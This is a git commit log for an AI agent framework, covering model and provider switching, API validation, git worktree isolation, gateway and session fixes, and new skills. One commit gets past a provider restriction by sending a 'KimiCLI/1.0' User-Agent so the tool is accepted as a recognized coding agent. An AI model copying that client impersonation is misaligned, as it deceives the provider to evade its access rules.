  Shows all providers with auth status (✓/✗), aliases, and active marker.
  Users can now discover what provider names work with provider:model syntax.

Gateway bugs fixed:
  - Config was saved even when validation.persist=False (told user 'session
    only' but actually persisted the unvalidated model)
  - HERMES_INFERENCE_PROVIDER env var not set on provider switch, causing
    the switch to be silently overridden if that env var was already set

parse_model_input hardened:
  - Colon only treated as provider delimiter if left side is a recognized
    provider name or alias. 'anthropic/claude-3.5-sonnet:beta' now passes
    through as a model name instead of trying provider='anthropic/claude-3.5-sonnet'.
  - HTTP URLs, random colons no longer misinterpreted.

56 tests passing across model validation, CLI commands, and integration.
2026-03-08 06:09:36 -07:00
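
A sketch of the hardened colon heuristic from the commit above: the left side of a colon is treated as a provider only when it is a recognized name or alias (registry contents are illustrative):

    KNOWN_PROVIDERS = {"openrouter", "nous", "zai", "kimi-coding", "minimax"}
    ALIASES = {"glm": "zai", "kimi": "kimi-coding"}

    def parse_model_input(raw: str) -> tuple[str | None, str]:
        """Return (provider, model); provider is None when not switching."""
        if ":" in raw and not raw.startswith(("http://", "https://")):
            left, right = raw.split(":", 1)
            provider = ALIASES.get(left, left)
            if provider in KNOWN_PROVIDERS:
                return provider, right
        # Unrecognized left side: the colon belongs to the model name,
        # e.g. 'anthropic/claude-3.5-sonnet:beta' on OpenRouter.
        return None, raw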
teknium1
34792dd907 fix: resolve 'auto' provider properly via credential detection
'auto' doesn't always mean openrouter — it could be nous, zai,
kimi-coding, etc. depending on configured credentials. Reverted the
hardcoded mapping and now both CLI and gateway call
resolve_provider() to detect the actual active provider when 'auto'
is set. Falls back to openrouter only if resolution fails.
2026-03-08 05:58:45 -07:00
teknium1
7ad6fc8a40 fix: gateway /model also needs normalize_provider for 'auto' resolution 2026-03-08 05:56:43 -07:00
teknium1
f824c10429 feat: enhance config migration with new environment variable tracking
Added a system to track environment variables introduced in each config version, allowing migration prompts to only mention new variables since the user's last version. Updated the interactive configuration process to offer users the option to set these new optional keys during migration.
2026-03-08 05:55:32 -07:00
teknium1
132e5ec179 fix: resolve 'auto' provider in /model display + update gateway handler
- normalize_provider('auto') now returns 'openrouter' (the default)
  so /model shows the curated model list instead of nothing
- CLI /model display uses normalize_provider before looking up labels
- Gateway /model handler now uses the same validation logic as CLI:
  live API probe, provider:model syntax, curated model list display
2026-03-08 05:54:52 -07:00
teknium1
66d3e6a0c2 feat: provider switching via /model + enhanced model display
Add provider:model syntax to /model command for runtime provider switching:
  /model zai:glm-5           → switch to Z.AI provider with glm-5
  /model nous:hermes-3       → switch to Nous Portal with hermes-3
  /model openrouter:anthropic/claude-sonnet-4.5  → explicit OpenRouter

When switching providers, credentials are resolved via resolve_runtime_provider
and validated before committing. Both model and provider are saved to config.
Provider aliases work (glm: → zai, kimi: → kimi-coding, etc.).

Enhanced /model (no args) display now shows:
  - Current model and provider
  - Curated model list for the current provider with ← marker
  - Usage examples including provider:model syntax

39 tests covering parse_model_input, curated_models_for_provider,
provider switching (success + credential failure), and display output.
2026-03-08 05:45:59 -07:00
teknium1
4a09ae2985 chore: remove dead module stubs from test_cli_init.py
The 200 lines of prompt_toolkit/rich/fire stubs added in PR #650 were
guarded by 'if module in sys.modules: return' and never activated since
those dependencies are always installed. Removed to keep the test file
lean. Also removed unused MagicMock and pytest imports.
2026-03-08 05:35:02 -07:00
teknium1
8c734f2f27 fix: remove OpenRouter '/' format enforcement — let API probe be the authority
Not all providers require 'provider/model' format. Removing the rigid
format check lets the live API probe handle all validation uniformly.
If someone types 'gpt-5.4' on OpenRouter, the probe won't find it and
will suggest 'openai/gpt-5.4' — better UX than a format rejection.
2026-03-08 05:31:41 -07:00
teknium1
245d174359 feat: validate /model against live API instead of hardcoded lists
Replace the static catalog-based model validation with a live API probe.
The /model command now hits the provider's /models endpoint to check if
the requested model actually exists:

- Model found in API → accepted + saved to config
- Model NOT found in API → rejected with 'Error: not a valid model'
  and fuzzy-match suggestions from the live model list
- API unreachable → graceful fallback to hardcoded catalog (session-only
  for unrecognized models)
- Format errors (empty, spaces, missing '/') still caught instantly
  without a network call

The API probe takes ~0.2s for OpenRouter (346 models) and works with any
OpenAI-compatible endpoint (Ollama, vLLM, custom, etc.).

32 tests covering all paths: format checks, API found, API not found,
API unreachable fallback, CLI integration.
2026-03-08 05:22:20 -07:00
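
A minimal sketch of the live probe described above, assuming an OpenAI-compatible /models endpoint; the fuzzy matching via difflib is an assumption, not necessarily what /model uses:

    import difflib
    import httpx

    def probe_model(base_url: str, api_key: str, model: str) -> tuple[str, list[str]]:
        """Return ('found' | 'missing' | 'unreachable', suggestions)."""
        try:
            resp = httpx.get(
                f"{base_url.rstrip('/')}/models",
                headers={"Authorization": f"Bearer {api_key}"},
                timeout=5.0,
            )
            resp.raise_for_status()
            ids = [m["id"] for m in resp.json().get("data", [])]
        except (httpx.HTTPError, KeyError, ValueError):
            return "unreachable", []   # caller falls back to the static catalog
        if model in ids:
            return "found", []
        return "missing", difflib.get_close_matches(model, ids, n=3, cutoff=0.4)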
stablegenius49
77f47768dd fix: improve /history message display 2026-03-08 05:08:57 -07:00
aydnOktay
7b1f40dd00 Improve error handling and logging in code execution tool 2026-03-08 14:50:23 +03:00
teknium1
90fa9e54ca fix: guard validate_requested_model + expand test coverage (PR #649 follow-up)
- Wrap validate_requested_model in try/except so /model doesn't crash
  if validation itself fails (falls back to old accept+save behavior)
- Remove unnecessary sys.path.insert from both test files
- Expand test_model_validation.py: 4 → 23 tests covering normalize_provider,
  provider_model_ids, empty/whitespace/spaces rejection, OpenRouter format
  validation, custom endpoints, nous provider, provider aliases, unknown
  providers, fuzzy suggestions
- Expand test_cli_model_command.py: 2 → 5 tests adding known-model save,
  validation crash fallback, and /model with no argument
2026-03-08 04:47:35 -07:00
stablegenius49
9d3a44e0e8 fix: validate /model values before saving 2026-03-08 04:47:35 -07:00
teknium1
932d596466 feat: enhance systemd unit and install script for browser dependencies
Updated the systemd unit generation to include the virtual environment and node modules in the PATH, improving the execution context for the hermes CLI. Additionally, added support for installing Playwright and its dependencies on Arch/Manjaro systems in the install script, ensuring a smoother setup process for browser tools.
2026-03-08 04:36:23 -07:00
teknium1
d518f40e8b fix: improve browser command environment setup
Enhanced the environment setup for browser commands by ensuring the PATH variable includes standard directories, addressing potential issues with minimal PATH in systemd services. Additionally, updated the logging of stderr to use a warning level on failure for better visibility of errors. This change improves the robustness of subprocess execution in the browser tool.
2026-03-08 04:08:44 -07:00
Teknium
f016cfca46 Merge pull request #685 from NousResearch/revert-659-feat/skill-prerequisites
Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies"
2026-03-08 03:58:41 -07:00
Teknium
b8120df860 Revert "feat: skill prerequisites — hide skills with unmet runtime dependencies" 2026-03-08 03:58:13 -07:00
teknium1
0df7df52f3 test: expand slash command autocomplete coverage (PR #645 follow-up)
- Fix failing test: use display_text/display_meta_text instead of str()
  on prompt_toolkit FormattedText objects
- Add regression guard: EXPECTED_COMMANDS set ensures no command
  silently disappears from the shared dict
- Add edge case tests: non-slash input, empty input, partial vs exact
  match trailing space, builtin display_meta content
- Add skill provider tests: None provider, exception swallowing,
  description truncation at 50 chars, missing description fallback,
  exact-match trailing space on skill commands
- Total: 15 tests (up from 4)
2026-03-08 03:53:22 -07:00
stablegenius49
bfa27d0a68 fix(cli): unify slash command autocomplete registry 2026-03-08 03:53:22 -07:00
teknium1
5a20c486e3 Merge PR #659: feat: skill prerequisites — hide skills with unmet runtime dependencies
Authored by kshitijk4poor. Fixes #630.
2026-03-08 03:12:35 -07:00
teknium1
78e19ebc95 chore: update .gitignore to include .worktrees directory
Added .worktrees to the .gitignore file to prevent tracking of worktree-specific files, ensuring a cleaner repository.
2026-03-08 03:01:46 -07:00
teknium1
b383cafc44 refactor: rename and enhance shell detection in local environment
Renamed _find_shell to _find_bash to clarify its purpose of specifically locating bash. Improved the shell detection logic to prioritize bash over the user's $SHELL, ensuring compatibility with the fence wrapper's syntax requirements. Added a backward compatibility alias for _find_shell to maintain existing imports in process_registry.py.
2026-03-08 03:00:05 -07:00
teknium1
b10ff83566 fix: enhance PATH handling in local environment
Updated the LocalEnvironment class to ensure the PATH variable includes standard directories. This change addresses issues with systemd services and terminal multiplexers that inherit a minimal PATH, improving the execution environment for subprocesses.
2026-03-08 01:50:38 -08:00
teknium1
daa1f542f9 fix: enhance shell detection in local environment configuration
Updated the _find_shell function to improve shell detection on non-Windows systems. The function now checks for the existence of /usr/bin/bash and /bin/bash before falling back to /bin/sh, ensuring a more robust shell resolution process.
2026-03-08 01:43:00 -08:00
teknium1
d507f593d0 fix: respect config.yaml cwd in gateway, add sandbox_dir config option
Two fixes:

1. Gateway CWD override: TERMINAL_CWD from config.yaml was being
   unconditionally overwritten by the messaging_cwd fallback (line 114).
   Now explicit paths in config.yaml are respected — only '.' / 'auto' /
   'cwd' (or unset) fall back to MESSAGING_CWD or home directory.

2. sandbox_dir config: Added terminal.sandbox_dir to config.yaml bridge
   in gateway/run.py, cli.py, and hermes_cli/config.py. Maps to
   TERMINAL_SANDBOX_DIR env var, which get_sandbox_dir() reads to
   determine where Docker/Singularity sandbox data is stored (default:
   ~/.hermes/sandboxes/). Users can now set:
     hermes config set terminal.sandbox_dir /data/hermes-sandboxes
2026-03-08 01:33:46 -08:00
kshitij
f210510276 feat: add prerequisites field to skill spec — hide skills with unmet dependencies
Skills can now declare runtime prerequisites (env vars, CLI binaries) via
YAML frontmatter. Skills with unmet prerequisites are excluded from the
system prompt so the agent never claims capabilities it can't deliver, and
skill_view() warns the agent about what's missing.

Three layers of defense:
- build_skills_system_prompt() filters out unavailable skills
- _find_all_skills() flags unmet prerequisites in metadata
- skill_view() returns prerequisites_warning with actionable details

Tagged 12 bundled skills that have hard runtime dependencies:
gif-search (TENOR_API_KEY), notion (NOTION_API_KEY), himalaya, imessage,
apple-notes, apple-reminders, openhue, duckduckgo-search, codebase-inspection,
blogwatcher, songsee, mcporter.

Closes #658
Fixes #630
2026-03-08 13:19:32 +05:30
teknium1
19b6f81ee7 fix: allow Anthropic API URLs as custom OpenAI-compatible endpoints
Removed the hard block on base_url containing 'api.anthropic.com'.
Anthropic now offers an OpenAI-compatible /chat/completions endpoint,
so blocking their URL prevents legitimate use. If the endpoint isn't
compatible, the API call will fail with a proper error anyway.

Removed from: run_agent.py, mini_swe_runner.py
Updated test to verify Anthropic URLs are accepted.
2026-03-07 23:36:35 -08:00
Teknium
76545ab365 Merge pull request #657 from NousResearch/feat/browser-screenshot-sharing
feat: browser screenshot sharing via MEDIA: on all messaging platforms
2026-03-07 22:57:42 -08:00
teknium1
b8c3bc7841 feat: browser screenshot sharing via MEDIA: on all messaging platforms
browser_vision now saves screenshots persistently to ~/.hermes/browser_screenshots/
and returns the screenshot_path in its JSON response. The model can include
MEDIA:<path> in its response to share screenshots as native photos.

Changes:
- browser_tool.py: Save screenshots persistently, return screenshot_path,
  auto-cleanup files older than 24 hours, mkdir moved inside try/except
- telegram.py: Add send_image_file() — sends local images via bot.send_photo()
- discord.py: Add send_image_file() — sends local images via discord.File
- slack.py: Add send_image_file() — sends local images via files_upload_v2()
  (WhatsApp already had send_image_file — no changes needed)
- prompt_builder.py: Updated Telegram hint to list image extensions,
  added Discord and Slack MEDIA: platform hints
- browser.md: Document screenshot sharing and 24h cleanup
- send_file_integration_map.md: Updated to reflect send_image_file is now
  implemented on Telegram/Discord/Slack
- test_send_image_file.py: 19 tests covering MEDIA: .png extraction,
  send_image_file on all platforms, and screenshot cleanup

Partially addresses #466 (Phase 0: platform adapter gaps for send_image_file).
2026-03-07 22:57:05 -08:00
teknium1
a680367568 fix tmux menus 2026-03-07 22:14:21 -08:00
teknium1
dfd37a4b31 Merge PR #635: fix: add Kimi Code API support (api.kimi.com/coding/v1)
Authored by christomitov. Auto-detects sk-kimi- key prefix and routes
to api.kimi.com/coding/v1. Adds User-Agent header for Kimi Code API
compatibility. Legacy Moonshot keys continue to work unchanged.
2026-03-07 21:45:27 -08:00
teknium1
5ee9b67d9b Merge PR #654: feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Adds --worktree (-w) flag to hermes CLI for isolated git worktree sessions.
Multiple agents can work on the same repo concurrently without collisions.

Closes #652
2026-03-07 21:38:42 -08:00
teknium1
542faf225f Fix Telegram image delivery for large (>5MB) images
Telegram's send_photo via URL has a ~5MB limit. Upscaled images from
fal.ai's Clarity Upscaler often exceed this, causing 'Wrong type of
web page content' or 'Failed to get http url content' errors.

Fix: Add download-and-upload fallback in Telegram's send_image().
When URL-based send_photo fails, download the image via httpx and
re-upload as bytes (supports up to 10MB file uploads).

Also: convert print() to logger.warning/error in image sending path
for proper log visibility (print goes to socket, invisible in logs).
2026-03-07 21:29:45 -08:00
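
A sketch of the download-and-upload fallback described above, assuming a python-telegram-bot-style async Bot.send_photo that accepts either a URL or raw bytes; the real send_image() wrapper differs:

    import httpx

    async def send_image(bot, chat_id: int, url: str) -> None:
        try:
            # Telegram fetches the URL itself; this path has a ~5MB cap.
            await bot.send_photo(chat_id=chat_id, photo=url)
        except Exception:
            # Fallback: fetch the bytes ourselves and upload directly,
            # which raises the limit to ~10MB for file uploads.
            async with httpx.AsyncClient() as client:
                resp = await client.get(url, timeout=30.0)
                resp.raise_for_status()
            await bot.send_photo(chat_id=chat_id, photo=resp.content)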
teknium1
5684c68121 Add logger.info/error for image extraction and delivery debugging 2026-03-07 21:24:47 -08:00
teknium1
4be783446a fix: wire worktree flag into hermes CLI entry point + docs + tests
Critical fixes:
- Add --worktree/-w to hermes_cli/main.py argparse (both chat
  subcommand and top-level parser) so 'hermes -w' works via the
  actual CLI entry point, not just 'python cli.py -w'
- Pass worktree flag through cmd_chat() kwargs to cli_main()
- Handle worktree attr in bare 'hermes' and --resume/--continue paths

Bug fixes in cli.py:
- Skip worktree creation for --list-tools/--list-toolsets (wasteful)
- Wrap git worktree subprocess.run in try/except (crash on timeout)
- Add stale worktree pruning on startup (_prune_stale_worktrees):
  removes clean worktrees older than 24h left by crashed/killed sessions

Documentation updates:
- AGENTS.md: add --worktree to CLI commands table
- cli-config.yaml.example: add worktree config section
- website/docs/reference/cli-commands.md: add to core commands
- website/docs/user-guide/cli.md: add usage examples
- website/docs/user-guide/configuration.md: add config docs

Test improvements (17 → 31 tests):
- Stale worktree pruning (prune old clean, keep recent, keep dirty)
- Directory symlink via .worktreeinclude
- Edge cases (no commits, not a repo, pre-existing .worktrees/)
- CLI flag/config OR logic
- TERMINAL_CWD integration
- System prompt injection format
2026-03-07 21:05:40 -08:00
teknium1
8d719b180a feat: git worktree isolation for parallel CLI sessions (--worktree / -w)
Add a --worktree (-w) flag to the hermes CLI that creates an isolated
git worktree for the session. This allows running multiple hermes-agent
instances concurrently on the same repo without file collisions.

How it works:
- On startup with -w: detects git repo, creates .worktrees/<session>/
  with its own branch (hermes/<session-id>), sets TERMINAL_CWD to it
- Each agent works in complete isolation — independent HEAD, index,
  and working tree, shared git object store
- On exit: auto-removes worktree and branch if clean, warns and
  keeps if there are uncommitted changes
- .worktreeinclude file support: list gitignored files (.env, .venv/)
  to auto-copy/symlink into new worktrees
- .worktrees/ is auto-added to .gitignore
- Agent gets a system prompt note about the worktree context
- Config support: set worktree: true in config.yaml to always enable

Usage:
  hermes -w                      # Interactive mode in worktree
  hermes -w -q "Fix issue #123"  # Single query in worktree
  # Or in config.yaml:
  worktree: true

Includes 17 tests covering: repo detection, worktree creation,
independence verification, cleanup (clean/dirty), .worktreeinclude,
.gitignore management, and 10 concurrent worktrees.

Closes #652
2026-03-07 20:51:08 -08:00
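
A minimal sketch of the worktree lifecycle described above; paths and branch naming follow the commit text, error handling and .worktreeinclude support are elided:

    import subprocess
    from pathlib import Path

    def create_worktree(repo: Path, session_id: str) -> Path:
        path = repo / ".worktrees" / session_id
        branch = f"hermes/{session_id}"
        subprocess.run(
            ["git", "worktree", "add", "-b", branch, str(path)],
            cwd=repo, check=True, timeout=30,
        )
        return path  # caller points TERMINAL_CWD here

    def remove_if_clean(repo: Path, path: Path, branch: str) -> None:
        dirty = subprocess.run(
            ["git", "status", "--porcelain"],
            cwd=path, capture_output=True, text=True,
        ).stdout.strip()
        if not dirty:  # keep the worktree if there are uncommitted changes
            subprocess.run(["git", "worktree", "remove", str(path)], cwd=repo, check=True)
            subprocess.run(["git", "branch", "-D", branch], cwd=repo, check=True)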
teknium1
bf048c8aec feat: add qmd optional skill — local knowledge base search
Add official optional skill for qmd (tobi/qmd), a local on-device
search engine for personal knowledge bases, notes, docs, and meeting
transcripts.

Covers:
- Installation and setup for macOS and Linux
- Collection management and context annotations
- All search modes: BM25, vector, hybrid with reranking
- MCP integration (stdio and HTTP daemon modes)
- Structured query patterns and best practices
- systemd/launchd service configs for daemon persistence

Placed in optional-skills/ due to heavyweight requirements
(Node >= 22, ~2GB local models).
2026-03-07 20:39:05 -08:00
teknium1
c5a9d1ef9d Merge branch 'main' into pr-635 2026-03-07 20:36:42 -08:00
teknium1
c7b6f423c7 feat: auto-compress pathologically large gateway sessions (#628)
Long-lived gateway sessions can accumulate enough history that every new
message rehydrates an oversized transcript, causing repeated truncation
failures (finish_reason=length).

Add a session hygiene check in _handle_message that runs right after
loading the transcript and before invoking the agent:

1. Estimate message count and rough token count of the transcript
2. If above configurable thresholds (default: 200 msgs or 100K tokens),
   auto-compress the transcript proactively
3. Notify the user about the compression with before/after stats
4. If still above warn threshold (default: 200K tokens) after
   compression, suggest /reset
5. If compression fails on a dangerously large session, warn the user
   to use /compress or /reset manually

Thresholds are configurable via config.yaml:

  session_hygiene:
    auto_compress_tokens: 100000
    auto_compress_messages: 200
    warn_tokens: 200000

This complements the agent's existing preflight compression (which
runs inside run_conversation) by catching pathological sessions at
the gateway layer before the agent is even created.

Includes 12 tests for threshold detection and token estimation.
2026-03-07 20:09:48 -08:00
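
A sketch of the threshold check described above; the 4-characters-per-token estimate is a common rough heuristic and an assumption here, not necessarily what the gateway uses:

    DEFAULTS = {
        "auto_compress_tokens": 100_000,
        "auto_compress_messages": 200,
        "warn_tokens": 200_000,
    }

    def estimate_tokens(messages: list[dict]) -> int:
        # Rough heuristic: ~4 characters of content per token.
        return sum(len(str(m.get("content", ""))) for m in messages) // 4

    def needs_auto_compress(messages: list[dict], cfg: dict = DEFAULTS) -> bool:
        return (len(messages) >= cfg["auto_compress_messages"]
                or estimate_tokens(messages) >= cfg["auto_compress_tokens"])

    def should_suggest_reset(messages: list[dict], cfg: dict = DEFAULTS) -> bool:
        return estimate_tokens(messages) >= cfg["warn_tokens"]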
teknium1
6d34207167 Merge PR #620: fix: restore missing MIT license file
Authored by stablegenius49. Fixes #619.
2026-03-07 20:00:33 -08:00
Bryan Young
fcde9be10d fix: keep tool-call output runs intact during compression 2026-03-08 03:13:14 +00:00
teknium1
3830bbda41 fix: include url in web_extract trimmed results & fix docs
The web_extract_tool was stripping the 'url' key during its output
trimming step, but documentation in 3 places claimed it was present.
This caused KeyError when accessing result['url'] in execute_code
scripts, especially when extracting from multiple URLs.

Changes:
- web_tools.py: Add 'url' back to trimmed_results output
- code_execution_tool.py: Add 'title' to _TOOL_STUBS docstring and
  _TOOL_DOC_LINES so docs match actual {url, title, content, error}
  response format
2026-03-07 18:07:36 -08:00
Christo Mitov
4447e7d71a fix: add Kimi Code API support (api.kimi.com/coding/v1)
Kimi Code (platform.kimi.ai) issues API keys prefixed sk-kimi- that require:
1. A different base URL: api.kimi.com/coding/v1 (not api.moonshot.ai/v1)
2. A User-Agent header identifying a recognized coding agent

Without this fix, sk-kimi- keys fail with 401 (wrong endpoint) or 403
('only available for Coding Agents') errors.

Changes:
- Auto-detect sk-kimi- key prefix and route to api.kimi.com/coding/v1
- Send User-Agent: KimiCLI/1.0 header for Kimi Code endpoints
- Legacy Moonshot keys (api.moonshot.ai) continue to work unchanged
- KIMI_BASE_URL env var override still takes priority over auto-detection
- Updated .env.example with correct docs and all endpoint options
- Fixed doctor.py health check for Kimi Code keys

Reference: https://github.com/MoonshotAI/kimi-cli (platforms.py)
2026-03-07 21:00:12 -05:00
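
A sketch of the key-prefix routing from the commit above; URLs, the User-Agent value, and the override precedence are taken from the commit message, the helper itself is illustrative:

    import os

    def resolve_kimi_endpoint(api_key: str) -> tuple[str, dict]:
        override = os.getenv("KIMI_BASE_URL")
        if override:
            base_url = override                                 # explicit override wins
        elif api_key.startswith("sk-kimi-"):
            base_url = "https://api.kimi.com/coding/v1"         # Kimi Code keys
        else:
            base_url = "https://api.moonshot.ai/v1"             # legacy Moonshot keys
        headers = {}
        if "api.kimi.com" in base_url:
            headers["User-Agent"] = "KimiCLI/1.0"  # required by the Kimi Code API
        return base_url, headers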
teknium1
7bccd904c7 Merge PR #629: feat: add Polymarket prediction market skill (read-only)
Adds market-data/polymarket skill — read-only access to Polymarket's public
prediction market APIs. Zero dependencies, zero auth required.
Addresses #589.
2026-03-07 17:28:03 -08:00
teknium1
313d522b61 feat: add Polymarket prediction market skill (read-only)
Adds a new market-data/polymarket skill for querying Polymarket's public
prediction market APIs. Pure read-only, zero authentication required,
zero external dependencies (stdlib only).

Includes:
- SKILL.md: Agent instructions with key concepts and workflow
- references/api-endpoints.md: Full API reference (Gamma, CLOB, Data APIs)
- scripts/polymarket.py: CLI helper for search, trending, prices, orderbooks,
  price history, and recent trades

Addresses #589.
2026-03-07 17:27:29 -08:00
teknium1
9ee4fe41fe Fix image_generate 'Event loop is closed' in gateway
Root cause: fal_client.AsyncClient uses @cached_property for its
httpx.AsyncClient, creating it once and caching forever. In the gateway,
the agent runs in a thread pool where _run_async() calls asyncio.run()
which creates a temporary event loop. The first call works, but
asyncio.run() closes that loop. On the next call, a new loop is created
but the cached httpx.AsyncClient still references the old closed loop,
causing 'Event loop is closed'.

Fix: Switch from async fal_client API (submit_async/handler.get with
await) to sync API (submit/handler.get). The sync API uses httpx.Client
which has no event loop dependency. Since the tool already runs in a
thread pool via the gateway, async adds no benefit here.

Changes:
- image_generate_tool: async def -> def
- _upscale_image: async def -> def
- fal_client.submit_async -> fal_client.submit
- await handler.get() -> handler.get()
- is_async=True -> is_async=False in registry
- Remove unused asyncio import
2026-03-07 16:56:49 -08:00
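
A sketch of the sync-API shape the fix moves to, per the commit's before/after list (the fal_client call names come from the commit; the application id and arguments are hypothetical):

    import fal_client

    def image_generate(prompt: str) -> dict:
        # Sync API: httpx.Client underneath, no event-loop affinity, so it is
        # safe to call repeatedly from thread-pool workers even though each
        # worker's asyncio.run() elsewhere creates and closes temporary loops.
        handler = fal_client.submit(
            "fal-ai/flux/dev",                  # hypothetical model endpoint
            arguments={"prompt": prompt},
        )
        return handler.get()                    # blocks until the job completes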
teknium1
39ee3512cb Merge PR #614: fix: resolve systemd restart loop with --replace flag
Authored by voidborne-d. Fixes #576.

Adds --replace flag to 'hermes gateway run' that terminates any existing
gateway instance (SIGTERM with SIGKILL fallback) before starting.
Updated systemd unit template with --replace, ExecStop, KillMode, and
TimeoutStopSec for robust service management.
2026-03-07 16:33:27 -08:00
teknium1
42673556af Merge PR #575: fix(setup): prevent OpenRouter model list fallback for Nous provider
Authored by PercyDikec. Fixes #574.

# Conflicts:
#	hermes_cli/setup.py
2026-03-07 16:22:13 -08:00
teknium1
faab73ad58 Merge PR #573: fix(doctor): detect OpenAI custom endpoint env settings
Authored by stablegenius49. Fixes #572.
2026-03-07 16:16:08 -08:00
teknium1
7e36468511 fix: /clear command broken inside TUI (patch_stdout interference)
The /clear command was using Rich's console.clear() and console.print()
which write directly to stdout. Inside the TUI, prompt_toolkit's
patch_stdout intercepts stdout via StdoutProxy, which doesn't interpret
screen-clearing escape sequences and mangles Rich's ANSI output,
resulting in raw escape codes dumped to the terminal.

Fix:
- Use prompt_toolkit's output.erase_screen() + cursor_goto() to clear
  the terminal directly (bypasses patch_stdout's StdoutProxy)
- Render the banner through ChatConsole (which routes Rich output
  through prompt_toolkit's native print_formatted_text/ANSI renderer)
- Use _cprint for the status message (prompt_toolkit-compatible)
- Fall back to the old behavior when not inside the TUI (e.g. startup)
2026-03-07 16:09:23 -08:00
vincent
86eed141af fix: rebuild compressed payload before retry 2026-03-07 18:55:01 -05:00
Blake Johnson
c6df39955c fix: limit concurrent Modal sandbox creations to avoid deadlocks
- Add max_concurrent_tasks config (default 8) with semaphore in TB2 eval
- Pass cwd: /app via register_task_env_overrides for TB2 tasks
- Add /home/ to host path prefixes as safety net for container backends

When all 86 TerminalBench2 tasks fire simultaneously, each creates a Modal sandbox
via asyncio.run() inside a thread pool worker. Modal's blocking calls deadlock
when too many are created at once. The semaphore ensures max 8 concurrent creations.

Co-Authored-By: hermes-agent[bot] <hermes-agent[bot]@users.noreply.github.com>
2026-03-07 14:02:34 -08:00
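
A minimal sketch of the semaphore bound described above; create_sandbox is a hypothetical stand-in for the real Modal sandbox creation:

    import asyncio

    MAX_CONCURRENT_TASKS = 8
    _sandbox_gate = asyncio.Semaphore(MAX_CONCURRENT_TASKS)

    async def create_sandbox(task_id: str) -> str:
        await asyncio.sleep(0.1)   # stand-in for the real Modal call
        return f"sandbox-{task_id}"

    async def create_sandbox_bounded(task_id: str) -> str:
        # At most 8 creations in flight; the rest queue here instead of
        # piling into Modal's blocking calls all at once.
        async with _sandbox_gate:
            return await create_sandbox(task_id)

    async def main() -> None:
        # All 86 tasks can be launched together; the gate serializes them.
        await asyncio.gather(*(create_sandbox_bounded(str(i)) for i in range(86)))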
stablegenius49
9ba5d399e5 fix: restore missing MIT license file 2026-03-07 13:43:08 -08:00
aydnOktay
19459b7623 Improve skills tool error handling 2026-03-08 00:30:49 +03:00
teknium1
306d92a9d7 refactor(context_compressor): improve summary generation logic and error handling
Updated the _generate_summary method to attempt summary generation using the auxiliary model first, with a fallback to the main model. If both attempts fail, the method now returns None instead of a placeholder, allowing the caller to handle missing summaries appropriately. This change enhances the robustness of context compression and improves logging for failure scenarios.
2026-03-07 11:54:51 -08:00
teknium1
5baae0df88 feat(scheduler): enhance job configuration with reasoning effort, prefill messages, and provider routing
Added support for loading reasoning configuration, prefill messages, and provider routing from environment variables or config.yaml in the run_job function. This improves flexibility and customization for job execution, allowing for better control over agent behavior and message handling.
2026-03-07 11:37:16 -08:00
teknium1
24f6a193e7 fix: remove stale 'model' assertion from delegate_task schema test
The 'model' property was removed from DELEGATE_TASK_SCHEMA but the
test still asserted its presence, causing CI to fail.
2026-03-07 11:29:55 -08:00
teknium1
8c0f8baf32 feat(delegate_tool): add additional parameters for child agent configuration
Enhanced the _run_single_child function by introducing max_tokens, reasoning_config, and prefill_messages parameters from the parent agent. This allows for more flexible configuration of child agents, improving their operational capabilities.
2026-03-07 11:29:17 -08:00
teknium1
d80c30cc92 feat(gateway): proactive async memory flush on session expiry
Previously, when a session expired (idle/daily reset), the memory flush
ran synchronously inside get_or_create_session — blocking the user's
message for 10-60s while an LLM call saved memories.

Now a background watcher task (_session_expiry_watcher) runs every 5 min,
detects expired sessions, and flushes memories proactively in a thread
pool.  By the time the user sends their next message, memories are
already saved and the response is immediate.

Changes:
- Add _is_session_expired(entry) to SessionStore — works from entry
  alone without needing a SessionSource
- Add _pre_flushed_sessions set to track already-flushed sessions
- Remove sync _on_auto_reset callback from get_or_create_session
- Refactor flush into _flush_memories_for_session (sync worker) +
  _async_flush_memories (thread pool wrapper)
- Add _session_expiry_watcher background task, started in start()
- Simplify /reset command to use shared fire-and-forget flush
- Add 10 tests for expiry detection, callback removal, tracking
2026-03-07 11:27:50 -08:00
teknium1
e64d646bad Critical: scope the new subagent tool-call budget to the tool-call loop level, not the session level 2026-03-07 10:32:51 -08:00
teknium1
b84f9e410c feat: default reasoning effort from xhigh to medium
Reduces token usage and latency for most tasks by defaulting to
medium reasoning effort instead of xhigh. Users can still override
via config or CLI flag. Updates code, tests, example config, and docs.
2026-03-07 10:14:19 -08:00
d 🔹
ee5daba061 fix: resolve systemd restart loop with --replace flag (#576)
When running under systemd, the gateway could enter restart loops in two
scenarios:

1. The previous gateway process hasn't fully exited when systemd starts
   a new one, causing 'Gateway already running (PID ...)' → exit 1 →
   restart → same error → infinite loop.

2. The interactive CLI exits immediately in non-TTY mode, and systemd
   keeps restarting it.

Changes:

- Add --replace flag to 'hermes gateway run' that gracefully kills any
  existing gateway instance (SIGTERM → wait 10s → SIGKILL) before
  starting, preventing the PID-lock deadlock.

- Update the generated systemd unit template to use --replace by default,
  add ExecStop for clean shutdown, set KillMode=mixed and
  TimeoutStopSec=15 for proper process management.

- Existing behavior (without --replace) is unchanged: still prints the
  error message and exits, now also mentioning the --replace option.

Fixes #576
2026-03-07 18:08:12 +00:00
teknium1
23e84de830 refactor: remove model parameter from AIAgent initialization
Eliminated the model parameter from the AIAgent class initialization, streamlining the constructor and ensuring consistent behavior across agent instances. This change aligns with recent updates to the task delegation logic.
2026-03-07 09:48:19 -08:00
teknium1
48e0dc8791 feat: implement Z.AI endpoint detection for API key validation
Added functionality to detect the appropriate Z.AI endpoint based on the provided API key, accommodating different billing plans and regions. The setup process now probes available endpoints and updates the configuration accordingly, enhancing user experience and reducing potential billing errors. Updated the setup model provider function to integrate this new detection logic.
2026-03-07 09:43:37 -08:00
alireza78a
b0b19fdeb1 fix(session): atomic write for sessions.json to prevent data loss on crash 2026-03-07 20:57:00 +03:30
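
A sketch of the standard atomic-write pattern the fix above implies; the temp-file naming is illustrative:

    import json
    import os
    from pathlib import Path

    def atomic_write_json(path: Path, data: dict) -> None:
        tmp = path.with_suffix(".tmp")
        with open(tmp, "w", encoding="utf-8") as f:
            json.dump(data, f)
            f.flush()
            os.fsync(f.fileno())   # ensure bytes hit disk before the swap
        os.replace(tmp, path)      # atomic rename: readers see old or new, never half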
teknium1
fb0f579b16 refactor: remove model parameter from delegate_task function
Eliminated the model parameter from the delegate_task function and its associated schema, defaulting to None for subagent calls. This change simplifies the function signature and enforces consistent behavior across task delegation.
